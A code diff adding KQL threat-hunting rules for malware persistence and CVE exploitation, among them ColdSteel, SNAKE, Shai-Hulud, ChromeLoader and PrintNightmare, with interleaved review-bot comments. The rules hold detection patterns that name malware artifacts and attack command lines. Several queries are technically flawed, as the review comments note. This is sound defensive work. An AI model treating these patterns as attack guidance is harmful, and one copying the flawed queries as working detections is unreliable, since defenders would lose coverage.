+| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*" or RegistryKey endswith "Classes\\AppX3bbba44c6cae4d9695755183472171e2*" or RegistryKey endswith "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}*" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey endswith "\\SOFTWARE\\App*" and ((RegistryKey endswith "AppXbf13d4ea2945444d8b13e2121cb6b663*" or RegistryKey endswith "AppX70162486c7554f7f80f481985d67586d*" or RegistryKey endswith "AppX37cc7fdccd644b4f85f4b22d5a3f105a*") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql
new file mode 100644
index 00000000..0d6c789b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql
@@ -0,0 +1,12 @@
+// Title: Outlook Task/Note Reminder Received
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-05
+// Level: low
+// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats
+// False Positives:
+// - Legitimate reminders received for a task or a note will also trigger this rule.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Tasks*" or RegistryKey endswith "\\Notes*") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook*")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql
new file mode 100644
index 00000000..a8a4410a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql
@@ -0,0 +1,10 @@
+// Title: Potential BearLPE Exploitation
+// Author: Olaf Hartong
+// Date: 2019-05-22
+// Level: high
+// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/RP") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
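Review bot: The description line of the BearLPE hunk ends in `write\par`, an RTF paragraph control word carried over from the source text rather than part of the sentence; it should end `... arbitrary DACL write`. The header also never connects the ".job import" it describes to what the query actually keys on, so a second comment line such as `// Matches schtasks /change with /TN, /RU and /RP, the credential-change step used by the exploit` would help a reader triage a hit.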
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql
new file mode 100644
index 00000000..05ec713c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL Persistence Service DLL Creation
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
new file mode 100644
index 00000000..fa83fb64
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql
@@ -0,0 +1,13 @@
+// Title: Potential COLDSTEEL Persistence Service DLL Load
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql
new file mode 100644
index 00000000..7a667ab9
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL RAT File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\users\\public\\Documents\\dllhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql
new file mode 100644
index 00000000..36902f6b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL RAT Windows User Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "ANONYMOUS" or RegistryValueData contains "_DomainUser_") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-" and RegistryKey contains "\\ProfileImagePath")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
new file mode 100644
index 00000000..2cf6fc66
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
+// Author: Gregory
+// Date: 2023-10-11
+// Level: high
+// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\FoxitPDFReader.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" and FolderPath endswith ".hta"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql
new file mode 100644
index 00000000..4fe9a997
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36884 Exploitation Dropped File
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" and FolderPath endswith "\\file001.url" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql
new file mode 100644
index 00000000..56c86dbc
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql
@@ -0,0 +1,12 @@
+// Title: Potential Encrypted Registry Blob Related To SNAKE Malware
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: medium
+// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+// - Some additional tuning might be required to tune out legitimate processes that write to this key by default
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds*" and (not((RegistryKey endswith ".AssocFile.WAV" or RegistryKey contains ".wav.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
new file mode 100644
index 00000000..9b762bed
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
+This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "shutdown /l /f" and ProcessCommandLine contains "WEEKLY") and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql
new file mode 100644
index 00000000..7ed90560
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql
@@ -0,0 +1,10 @@
+// Title: Potential NetWire RAT Activity - Registry
+// Author: Christopher Peacock
+// Date: 2021-10-07
+// Level: high
+// Description: Detects registry keys related to NetWire RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\software\\NetWire"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
new file mode 100644
index 00000000..bd5277d2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql
@@ -0,0 +1,13 @@
+// Title: Potential Notepad++ CVE-2025-49144 Exploitation
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-26
+// Level: high
+// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path.
+This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer.
+The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\contextMenu\\NppShell.dll" and ProcessCommandLine startswith "regsvr32 /s" and FolderPath endswith "\\regsvr32.exe") and (not((FolderPath in~ ("C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql
new file mode 100644
index 00000000..127ba1e2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential PrintNightmare Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-07-01
+// Level: high
+// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
new file mode 100644
index 00000000..b130f579
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
@@ -0,0 +1,12 @@
+// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-31
+// Level: low
+// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
+Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or InitiatingProcessFolderPath endswith "\\control.exe") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap*") and ((RegistryValueData contains "DWORD (0x00000000)" and RegistryKey endswith "\\AutoDetect") or (RegistryValueData contains "DWORD (0x00000001)" and (RegistryKey endswith "\\IntranetName" or RegistryKey endswith "\\ProxyByPass" or RegistryKey endswith "\\UNCAsIntranet")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql
new file mode 100644
index 00000000..17a51abf
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql
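Review bot: The `RegistryValueData contains "DWORD (0x00000000)"` and `"DWORD (0x00000001)"` terms in the Raspberry Robin `| where` line are Sysmon's rendering of a DWORD in its Details field; the `DeviceRegistryEvents` column carries the plain value, so these terms will not match and the rule cannot fire on that backend. If this conversion targets Defender for Endpoint, the tests should be `RegistryValueData == "0"` for `\\AutoDetect` and `RegistryValueData == "1"` for the three other value names, with `RegistryValueType` available to pin the type if needed; confirm against a live event, since this depends on how the backend renders the value. The `ZoneMap*` literal wildcard in the same line is a separate issue already noted on the ScreenConnect hunk above.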
@@ -0,0 +1,10 @@
+// Title: Potential Ursnif Malware Activity - Registry
+// Author: megan201296
+// Date: 2019-02-13
+// Level: high
+// Description: Detects registry keys related to Ursnif malware.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
new file mode 100644
index 00000000..e06e18c0
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
@@ -0,0 +1,14 @@
+// Title: ScreenConnect User Database Modification
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
+This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats
+// False Positives:
+// - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and (FolderPath contains "Temp" and FolderPath contains "ScreenConnect") and FolderPath endswith ".xml"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql
new file mode 100644
index 00000000..ff5530e3
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql
@@ -0,0 +1,12 @@
+// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-14
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "whoami" and ((ProcessCommandLine contains "./Client/Common/" or ProcessCommandLine contains ".\\Client\\Common\\") or ProcessCommandLine contains "C:\\Windows\\Temp\\Serv-U.bat")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql
new file mode 100644
index 00000000..f4b1f212
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql
@@ -0,0 +1,12 @@
+// Title: Shai-Hulud Malicious GitHub Workflow Creation
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql
new file mode 100644
index 00000000..4873205b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Small Sieve Malware Registry Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*" and (RegistryKey contains "Microsift" or RegistryValueData contains ".exe Platypus")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql
new file mode 100644
index 00000000..947bc083
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql
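Review bot: The Shai-Hulud `| where` line tests `FolderPath endswith ".github/workflows/shai-hulud-workflow.yml"` with forward slashes only, so on Windows endpoints, where `FolderPath` is backslash-separated, the rule cannot match and only Linux/macOS sensors would ever fire it. Unless the rule is meant to be Linux/macOS-only (in which case say so in the header), cover both separators, e.g. `| where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml" or FolderPath endswith ".github\\workflows\\shai-hulud-workflow.yml"`, and consider adding `ActionType == "FileCreated"` since the title is about creation.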
@@ -0,0 +1,10 @@
+// Title: SNAKE Malware Covert Store Registry Key
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-11
+// Level: high
+// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SECURITY\\Policy\\Secrets\\n"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql
new file mode 100644
index 00000000..3332cc7a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql
@@ -0,0 +1,10 @@
+// Title: SOURGUM Actor Behaviours
+// Author: MSTIC, FPT.EagleEye
+// Date: 2021-06-15
+// Level: high
+// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
+// MITRE Tactic: Persistence
+// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath contains "windows\\system32\\Physmem.sys" or FolderPath contains "Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini") or ((ProcessCommandLine contains "reg add" and (FolderPath contains "windows\\system32\\filepath2" or FolderPath contains "windows\\system32\\ime")) and (ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32" or ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32"))
\ No newline at end of file
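Review bot: The first branch of the `where` tests `FolderPath contains "windows\\system32\\Physmem.sys"` and the three `WimBootConfigurations.ini` paths against DeviceProcessEvents, whose FolderPath is the image of the created process; a driver or .ini file is not a process image, so that branch is unlikely to ever fire from this table. If the source rule's selection for those paths was file-based, they belong in a separate DeviceFileEvents query (DeviceImageLoadEvents for the .sys) rather than being OR-ed into the process query. `windows\\system32\\filepath2` also reads like a placeholder carried over from the source and is worth confirming before the rule ships.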
diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql
new file mode 100644
index 00000000..97a5181a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PrinterPorts Creation (CVE-2020-1048)
+// Author: EagleEye Team, Florian Roth
+// Date: 2020-05-13
+// Level: high
+// Description: Detects new commands that add new printer port which point to suspicious file
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats
+// False Positives:
+// - New printer port install on host
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-PrinterPort -Name" and (ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bat")) or ProcessCommandLine contains "Generic / Text Only"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql
new file mode 100644
index 00000000..23849038
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Process Spawned by CentreStack Portal AppPool
+// Author: Jason Rathbun (Blackpoint Cyber)
+// Date: 2025-04-17
+// Level: high
+// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406)
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats
+// False Positives:
+// - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "\\portal\\portal.config" and InitiatingProcessFolderPath endswith "\\w3wp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql
new file mode 100644
index 00000000..f8a299e5
--- /dev/null
+++ b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql
@@ -0,0 +1,13 @@
+// Title: Windows Spooler Service Suspicious Binary Load
+// Author: FPT.EagleEye, Thomas Patzke (improvements)
+// Date: 2021-06-29
+// Level: informational
+// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare).
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats
+// False Positives:
+// - Loading of legitimate driver
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql
new file mode 100644
index 00000000..f839c135
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql
@@ -0,0 +1,12 @@
+// Title: APT27 - Emissary Panda Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-09-03
+// Level: critical
+// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath endswith "\\sllauncher.exe") or (ProcessCommandLine contains "-k" and FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql
new file mode 100644
index 00000000..5b225c54
--- /dev/null
+++ b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql
@@ -0,0 +1,12 @@
+// Title: ChromeLoader Malware Execution
+// Author: @kostastsale
+// Date: 2022-01-10
+// Level: high
+// Description: Detects execution of ChromeLoader malware via a registered scheduled task
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*" and FolderPath endswith "\\chrome.exe" and InitiatingProcessCommandLine contains "-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB" and InitiatingProcessFolderPath endswith "\\powershell.exe"
\ No newline at end of file
